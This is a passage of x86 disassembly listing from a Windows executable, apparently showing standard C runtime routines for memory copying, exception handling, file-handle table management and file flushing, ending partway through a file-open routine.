sub_41F060 proc near ; CODE XREF: sub_41A27A+2DE�p
; sub_41BC2B+13�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41F080
cmp edi, eax
jb loc_41F1FC
loc_41F080: ; CODE XREF: sub_41F060+16�j
test edi, 3
jnz short loc_41F09C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41F0BC
rep movsd
jmp off_41F1AC[edx*4]
; ---------------------------------------------------------------------------
loc_41F09C: ; CODE XREF: sub_41F060+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41F0B4
and eax, 3
add ecx, eax
jmp dword ptr loc_41F0BC+4[eax*4]
; ---------------------------------------------------------------------------
loc_41F0B4: ; CODE XREF: sub_41F060+46�j
jmp dword ptr loc_41F1BC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41F0BC: ; CODE XREF: sub_41F060+31�j
; sub_41F060+8E�j ...
jmp off_41F140[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41F0D0
dd offset loc_41F0FC
dd offset loc_41F120
; ---------------------------------------------------------------------------
loc_41F0D0: ; DATA XREF: sub_41F060+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41F0BC
rep movsd
jmp off_41F1AC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41F0FC: ; DATA XREF: sub_41F060+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41F0BC
rep movsd
jmp off_41F1AC[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41F120: ; DATA XREF: sub_41F060+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41F0BC
rep movsd
jmp off_41F1AC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41F140 dd offset loc_41F1A3 ; DATA XREF: sub_41F060:loc_41F0BC�r
dd offset loc_41F190
dd offset loc_41F188
dd offset loc_41F180
dd offset loc_41F178
dd offset loc_41F170
dd offset loc_41F168
dd offset loc_41F160
; ---------------------------------------------------------------------------
loc_41F160: ; CODE XREF: sub_41F060:loc_41F0BC�j
; DATA XREF: sub_41F060+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41F168: ; CODE XREF: sub_41F060:loc_41F0BC�j
; DATA XREF: sub_41F060+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41F170: ; CODE XREF: sub_41F060:loc_41F0BC�j
; DATA XREF: sub_41F060+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41F178: ; CODE XREF: sub_41F060:loc_41F0BC�j
; DATA XREF: sub_41F060+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41F180: ; CODE XREF: sub_41F060:loc_41F0BC�j
; DATA XREF: sub_41F060+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41F188: ; CODE XREF: sub_41F060:loc_41F0BC�j
; DATA XREF: sub_41F060+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41F190: ; CODE XREF: sub_41F060:loc_41F0BC�j
; DATA XREF: sub_41F060+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41F1A3: ; CODE XREF: sub_41F060:loc_41F0BC�j
; DATA XREF: sub_41F060:off_41F140�o
jmp off_41F1AC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41F1AC dd offset loc_41F1BC ; DATA XREF: sub_41F060+35�r
; sub_41F060+92�r ...
dd offset loc_41F1C4
dd offset loc_41F1D0
dd offset loc_41F1E4
; ---------------------------------------------------------------------------
loc_41F1BC: ; CODE XREF: sub_41F060+35�j
; sub_41F060+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41F1C4: ; CODE XREF: sub_41F060+35�j
; sub_41F060+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41F1D0: ; CODE XREF: sub_41F060+35�j
; sub_41F060+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41F1E4: ; CODE XREF: sub_41F060+35�j
; sub_41F060+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41F1FC: ; CODE XREF: sub_41F060+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41F230
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41F224
std
rep movsd
cld
jmp off_41F348[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41F224: ; CODE XREF: sub_41F060+1B5�j
; sub_41F060+210�j ...
neg ecx
jmp off_41F2F8[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41F230: ; CODE XREF: sub_41F060+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41F248
and eax, 3
sub ecx, eax
jmp dword ptr loc_41F248+4[eax*4]
; ---------------------------------------------------------------------------
loc_41F248: ; CODE XREF: sub_41F060+1DA�j
; DATA XREF: sub_41F060+1E1�r
jmp off_41F348[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_41F25B+1
dd offset loc_41F280
; ---------------------------------------------------------------------------
test al, 0F2h
inc ecx
loc_41F25B: ; DATA XREF: sub_41F060+1F0�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_41F224
std
rep movsd
cld
jmp off_41F348[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41F280: ; DATA XREF: sub_41F060+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41F224
std
rep movsd
cld
jmp off_41F348[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41F224
std
rep movsd
cld
jmp off_41F348[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41F2FC
dd offset loc_41F304
dd offset loc_41F30C
dd offset loc_41F314
dd offset loc_41F31C
dd offset loc_41F324
dd offset loc_41F32C
off_41F2F8 dd offset loc_41F33F ; DATA XREF: sub_41F060+1C6�r
; ---------------------------------------------------------------------------
loc_41F2FC: ; DATA XREF: sub_41F060+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41F304: ; DATA XREF: sub_41F060+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41F30C: ; DATA XREF: sub_41F060+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41F314: ; DATA XREF: sub_41F060+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41F31C: ; DATA XREF: sub_41F060+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41F324: ; DATA XREF: sub_41F060+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41F32C: ; DATA XREF: sub_41F060+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41F33F: ; CODE XREF: sub_41F060+1C6�j
; DATA XREF: sub_41F060:off_41F2F8�o
jmp off_41F348[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41F348 dd offset loc_41F358 ; DATA XREF: sub_41F060+1BB�r
; sub_41F060:loc_41F248�r ...
dd offset loc_41F360
dd offset loc_41F370
dd offset loc_41F384
; ---------------------------------------------------------------------------
loc_41F358: ; CODE XREF: sub_41F060+1BB�j
; sub_41F060:loc_41F248�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41F360: ; CODE XREF: sub_41F060+1BB�j
; sub_41F060:loc_41F248�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41F370: ; CODE XREF: sub_41F060+1BB�j
; sub_41F060:loc_41F248�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41F384: ; CODE XREF: sub_41F060+1BB�j
; sub_41F060:loc_41F248�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41F060 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F3A8 proc near ; DATA XREF: __SEH_prolog�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41F448
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41F3DB: ; CODE XREF: sub_41F3A8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41F441
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41F42F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41F42F
js short loc_41F43A
mov edi, [ebx+8]
push ebx
call sub_417D60
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_417DA2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_417E36
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41F42F: ; CODE XREF: sub_41F3A8+40�j
; sub_41F3A8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41F3DB
; ---------------------------------------------------------------------------
loc_41F43A: ; CODE XREF: sub_41F3A8+54�j
mov eax, 0
jmp short loc_41F45D
; ---------------------------------------------------------------------------
loc_41F441: ; CODE XREF: sub_41F3A8+36�j
mov eax, 1
jmp short loc_41F45D
; ---------------------------------------------------------------------------
loc_41F448: ; CODE XREF: sub_41F3A8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_417DA2
add esp, 8
pop ebp
mov eax, 1
loc_41F45D: ; CODE XREF: sub_41F3A8+97�j
; sub_41F3A8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41F3A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_417DA2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41F480 proc near ; CODE XREF: sub_41F8F5+220�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
cmp ecx, dword_4815F0
push esi
push edi
jnb short loc_41F4E3
mov eax, ecx
sar eax, 5
lea edi, ds:481600h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [esi+eax], 0FFFFFFFFh
jnz short loc_41F4E3
cmp dword_432384, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41F4D9
sub ecx, 0
jz short loc_41F4D0
dec ecx
jz short loc_41F4CB
dec ecx
jnz short loc_41F4D9
push ebx
push 0FFFFFFF4h
jmp short loc_41F4D3
; ---------------------------------------------------------------------------
loc_41F4CB: ; CODE XREF: sub_41F480+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_41F4D3
; ---------------------------------------------------------------------------
loc_41F4D0: ; CODE XREF: sub_41F480+3E�j
push ebx
push 0FFFFFFF6h
loc_41F4D3: ; CODE XREF: sub_41F480+49�j
; sub_41F480+4E�j
call dword_422150 ; SetStdHandle
loc_41F4D9: ; CODE XREF: sub_41F480+39�j
; sub_41F480+44�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_41F4F9
; ---------------------------------------------------------------------------
loc_41F4E3: ; CODE XREF: sub_41F480+C�j
; sub_41F480+2B�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41F4F9: ; CODE XREF: sub_41F480+61�j
pop edi
pop esi
retn
sub_41F480 endp
; =============== S U B R O U T I N E =======================================
sub_41F4FC proc near ; CODE XREF: sub_41AD93+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp ecx, dword_4815F0
push esi
push edi
jnb short loc_41F562
mov eax, ecx
sar eax, 5
lea edi, ds:481600h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41F562
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41F562
cmp dword_432384, 1
jnz short loc_41F558
xor eax, eax
sub ecx, eax
jz short loc_41F54F
dec ecx
jz short loc_41F54A
dec ecx
jnz short loc_41F558
push eax
push 0FFFFFFF4h
jmp short loc_41F552
; ---------------------------------------------------------------------------
loc_41F54A: ; CODE XREF: sub_41F4FC+44�j
push eax
push 0FFFFFFF5h
jmp short loc_41F552
; ---------------------------------------------------------------------------
loc_41F54F: ; CODE XREF: sub_41F4FC+41�j
push eax
push 0FFFFFFF6h
loc_41F552: ; CODE XREF: sub_41F4FC+4C�j
; sub_41F4FC+51�j
call dword_422150 ; SetStdHandle
loc_41F558: ; CODE XREF: sub_41F4FC+3B�j
; sub_41F4FC+47�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_41F578
; ---------------------------------------------------------------------------
loc_41F562: ; CODE XREF: sub_41F4FC+C�j
; sub_41F4FC+2D�j ...
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41F578: ; CODE XREF: sub_41F4FC+64�j
pop edi
pop esi
retn
sub_41F4FC endp
; =============== S U B R O U T I N E =======================================
sub_41F57B proc near ; CODE XREF: sub_41AD93+7�p
; sub_41AD93+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4815F0
jnb short loc_41F5A5
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_481600[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
test byte ptr [eax+4], 1
jz short loc_41F5A5
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41F5A5: ; CODE XREF: sub_41F57B+A�j
; sub_41F57B+25�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_41F57B endp
; =============== S U B R O U T I N E =======================================
sub_41F5BC proc near ; CODE XREF: sub_41AE16+38�p
; sub_41B454+38�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
push esi
mov ecx, eax
sar ecx, 5
and eax, 1Fh
push edi
lea ebx, ds:481600h[ecx*4]
mov esi, [ebx]
lea edi, [eax+eax*8]
shl edi, 2
add esi, edi
cmp dword ptr [esi+8], 0
jnz short loc_41F61B
push 0Ah
call sub_41A1D6
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41F613
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jnz short loc_41F610
push 0Ah
call sub_41A142
pop ecx
xor eax, eax
jmp short loc_41F62B
; ---------------------------------------------------------------------------
loc_41F610: ; CODE XREF: sub_41F5BC+46�j
inc dword ptr [esi+8]
loc_41F613: ; CODE XREF: sub_41F5BC+32�j
push 0Ah
call sub_41A142
pop ecx
loc_41F61B: ; CODE XREF: sub_41F5BC+24�j
mov eax, [ebx]
lea eax, [eax+edi+0Ch]
push eax
call dword_42201C ; RtlEnterCriticalSection
xor eax, eax
inc eax
loc_41F62B: ; CODE XREF: sub_41F5BC+52�j
pop edi
pop esi
pop ebx
retn
sub_41F5BC endp
; =============== S U B R O U T I N E =======================================
sub_41F62F proc near ; CODE XREF: sub_41AE8D+1�p
; sub_41B4DB+1�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_481600[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+0Ch]
push eax
call dword_422018 ; RtlLeaveCriticalSection
retn
sub_41F62F endp
; =============== S U B R O U T I N E =======================================
sub_41F651 proc near ; CODE XREF: sub_41F8F5:loc_41FA89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebp
push 0Bh
or ebp, 0FFFFFFFFh
call sub_41A157
test eax, eax
pop ecx
jz loc_41F798
push ebx
push esi
push edi
push 0Bh
call sub_41A1D6
xor ebx, ebx
pop ecx
mov [esp+18h+var_8], ebx
mov [esp+18h+var_4], ebx
mov edi, offset dword_481600
loc_41F681: ; CODE XREF: sub_41F651+D5�j
mov esi, [edi]
test esi, esi
jz loc_41F738
lea eax, [esi+480h]
jmp short loc_41F6F1
; ---------------------------------------------------------------------------
loc_41F693: ; CODE XREF: sub_41F651+A2�j
test byte ptr [esi+4], 1
jnz short loc_41F6E7
cmp dword ptr [esi+8], 0
jnz short loc_41F6CC
push 0Ah
call sub_41A1D6
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41F6C4
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jz short loc_41F72E
inc dword ptr [esi+8]
loc_41F6C4: ; CODE XREF: sub_41F651+5A�j
push 0Ah
call sub_41A142
pop ecx
loc_41F6CC: ; CODE XREF: sub_41F651+4C�j
lea ebx, [esi+0Ch]
push ebx
call dword_42201C ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_41F6F7
push ebx
call dword_422018 ; RtlLeaveCriticalSection
mov ebx, [esp+18h+var_8]
loc_41F6E7: ; CODE XREF: sub_41F651+46�j
mov eax, [edi]
add esi, 24h
add eax, 480h
loc_41F6F1: ; CODE XREF: sub_41F651+40�j
cmp esi, eax
jb short loc_41F693
jmp short loc_41F713
; ---------------------------------------------------------------------------
loc_41F6F7: ; CODE XREF: sub_41F651+89�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, [edi]
push 24h
cdq
pop ecx
idiv ecx
mov ebp, eax
add ebp, [esp+18h+var_4]
cmp ebp, 0FFFFFFFFh
jnz short loc_41F78D
mov ebx, [esp+18h+var_8]
loc_41F713: ; CODE XREF: sub_41F651+A4�j
add [esp+18h+var_4], 20h
inc ebx
add edi, 4
cmp edi, offset dword_481700
mov [esp+18h+var_8], ebx
jl loc_41F681
jmp short loc_41F78D
; ---------------------------------------------------------------------------
loc_41F72E: ; CODE XREF: sub_41F651+6E�j
push 0Ah
call sub_41A142
pop ecx
jmp short loc_41F78A
; ---------------------------------------------------------------------------
loc_41F738: ; CODE XREF: sub_41F651+34�j
mov esi, 480h
push esi
call sub_416E1F
test eax, eax
pop ecx
jz short loc_41F78D
add dword_4815F0, 20h
lea ecx, ds:481600h[ebx*4]
mov [ecx], eax
lea edx, [eax+480h]
jmp short loc_41F776
; ---------------------------------------------------------------------------
loc_41F760: ; CODE XREF: sub_41F651+127�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 24h
add edx, esi
loc_41F776: ; CODE XREF: sub_41F651+10D�j
cmp eax, edx
jb short loc_41F760
shl ebx, 5
mov ebp, ebx
push ebp
call sub_41F5BC
test eax, eax
pop ecx
jnz short loc_41F78D
loc_41F78A: ; CODE XREF: sub_41F651+E5�j
or ebp, 0FFFFFFFFh
loc_41F78D: ; CODE XREF: sub_41F651+BC�j
; sub_41F651+DB�j ...
push 0Bh
call sub_41A142
pop ecx
pop edi
pop esi
pop ebx
loc_41F798: ; CODE XREF: sub_41F651+10�j
mov eax, ebp
pop ebp
pop ecx
pop ecx
retn
sub_41F651 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F79E proc near ; CODE XREF: sub_41AF39+1E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041F846 SIZE 00000014 BYTES
push 0Ch
push offset stru_42CB48
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815F0
jnb loc_41F846
mov eax, ebx
sar eax, 5
lea edi, ds:481600h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41F846
push ebx
call sub_41F5BC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41F81E
push ebx
call sub_41F57B
pop ecx
push eax
call dword_42214C ; FlushFileBuffers
test eax, eax
jnz short loc_41F80A
call dword_422008 ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_41F80E
; ---------------------------------------------------------------------------
loc_41F80A: ; CODE XREF: sub_41F79E+5F�j
and [ebp+var_1C], 0
loc_41F80E: ; CODE XREF: sub_41F79E+6A�j
cmp [ebp+var_1C], 0
jz short loc_41F82D
call sub_41B9AE
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_41F81E: ; CODE XREF: sub_41F79E+4D�j
call sub_41B9A5
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_41F82D: ; CODE XREF: sub_41F79E+74�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41F83E
mov eax, [ebp+var_1C]
jmp short loc_41F854
sub_41F79E endp
; =============== S U B R O U T I N E =======================================
sub_41F83B proc near ; DATA XREF: .text:stru_42CB48�o
mov ebx, [ebp+8]
sub_41F83B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41F83E proc near ; CODE XREF: sub_41F79E+93�p
push ebx
call sub_41F62F
pop ecx
retn
sub_41F83E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F79E
loc_41F846: ; CODE XREF: sub_41F79E+15�j
; sub_41F79E+39�j
call sub_41B9A5
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_41F854: ; CODE XREF: sub_41F79E+9B�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41F79E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B0EE
loc_41F85A: ; CODE XREF: sub_41B0EE+E�j
push 10h
push offset stru_42CB58
call __SEH_prolog
xor ebx, ebx
mov [ebp-1Ch], ebx
push 1
call sub_41A1D6
pop ecx
mov [ebp-4], ebx
push 3
pop edi
loc_41F879: ; CODE XREF: sub_41B0EE+47EA�j
mov [ebp-20h], edi
cmp edi, dword_482960
jge short loc_41F8DA
mov esi, edi
shl esi, 2
mov eax, dword_481940
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_41F8D7
test byte ptr [eax+0Ch], 83h
jz short loc_41F8AA
push eax
call sub_416E7D
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_41F8AA
inc dword ptr [ebp-1Ch]
loc_41F8AA: ; CODE XREF: sub_41B0EE+47AB�j
; sub_41B0EE+47B7�j
cmp edi, 14h
jl short loc_41F8D7
mov eax, dword_481940
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_422024 ; RtlDeleteCriticalSection
mov eax, dword_481940
push dword ptr [esi+eax]
call sub_416D07
pop ecx
mov eax, dword_481940
mov [esi+eax], ebx
loc_41F8D7: ; CODE XREF: sub_41B0EE+47A5�j
; sub_41B0EE+47BF�j
inc edi
jmp short loc_41F879
; ---------------------------------------------------------------------------
loc_41F8DA: ; CODE XREF: sub_41B0EE+4794�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_41F8EC
mov eax, [ebp-1Ch]
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41B0EE
; =============== S U B R O U T I N E =======================================
sub_41F8EC proc near ; CODE XREF: sub_41B0EE+47F0�p
; DATA XREF: .text:stru_42CB58�o
push 1
call sub_41A142
pop ecx
retn
sub_41F8EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F8F5 proc near ; CODE XREF: sub_41FBDC+28�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_C]
push ebx
push esi
xor esi, esi
test dl, dl
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], esi
jns short loc_41F919
mov [ebp+var_14], esi
mov [ebp+var_1], 10h
jmp short loc_41F924
; ---------------------------------------------------------------------------
loc_41F919: ; CODE XREF: sub_41F8F5+19�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41F924: ; CODE XREF: sub_41F8F5+22�j
mov eax, 8000h
test edx, eax
jnz short loc_41F93E
test dh, 40h
jnz short loc_41F93A
cmp dword_4815B8, eax
jz short loc_41F93E
loc_41F93A: ; CODE XREF: sub_41F8F5+3B�j
or [ebp+var_1], 80h
loc_41F93E: ; CODE XREF: sub_41F8F5+36�j
; sub_41F8F5+43�j
push 3
mov eax, edx
pop ebx
and eax, ebx
sub eax, esi
jz short loc_41F961
dec eax
jz short loc_41F958
dec eax
jnz short loc_41F97C
mov [ebp+var_10], 0C0000000h
jmp short loc_41F968
; ---------------------------------------------------------------------------
loc_41F958: ; CODE XREF: sub_41F8F5+55�j
mov [ebp+var_10], 40000000h
jmp short loc_41F968
; ---------------------------------------------------------------------------
loc_41F961: ; CODE XREF: sub_41F8F5+52�j
mov [ebp+var_10], 80000000h
loc_41F968: ; CODE XREF: sub_41F8F5+61�j
; sub_41F8F5+6A�j
cmp ecx, 10h
jz short loc_41F9AD
cmp ecx, 20h
jz short loc_41F9A4
cmp ecx, 30h
jz short loc_41F99B
cmp ecx, 40h
jz short loc_41F996
loc_41F97C: ; CODE XREF: sub_41F8F5+58�j
call sub_41B9A5
mov dword ptr [eax], 16h
call sub_41B9AE
mov [eax], esi
or eax, 0FFFFFFFFh
jmp loc_41FB8D
; ---------------------------------------------------------------------------
loc_41F996: ; CODE XREF: sub_41F8F5+85�j
mov [ebp+var_8], ebx
jmp short loc_41F9B0
; ---------------------------------------------------------------------------
loc_41F99B: ; CODE XREF: sub_41F8F5+80�j
mov [ebp+var_8], 2
jmp short loc_41F9B0
; ---------------------------------------------------------------------------
loc_41F9A4: ; CODE XREF: sub_41F8F5+7B�j
mov [ebp+var_8], 1
jmp short loc_41F9B0
; ---------------------------------------------------------------------------
loc_41F9AD: ; CODE XREF: sub_41F8F5+76�j
mov [ebp+var_8], esi
loc_41F9B0: ; CODE XREF: sub_41F8F5+A4�j
; sub_41F8F5+AD�j ...
mov eax, edx
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
push edi
mov edi, 100h
jg short loc_41F9F7
jz short loc_41F9F2
cmp eax, esi
jz short loc_41F9F2
cmp eax, edi
jz short loc_41F9E9
cmp eax, 200h
jz short loc_41FA23
cmp eax, 300h
jnz short loc_41FA09
mov [ebp+var_C], 2
jmp short loc_41FA33
; ---------------------------------------------------------------------------
loc_41F9E9: ; CODE XREF: sub_41F8F5+DB�j
mov [ebp+var_C], 4
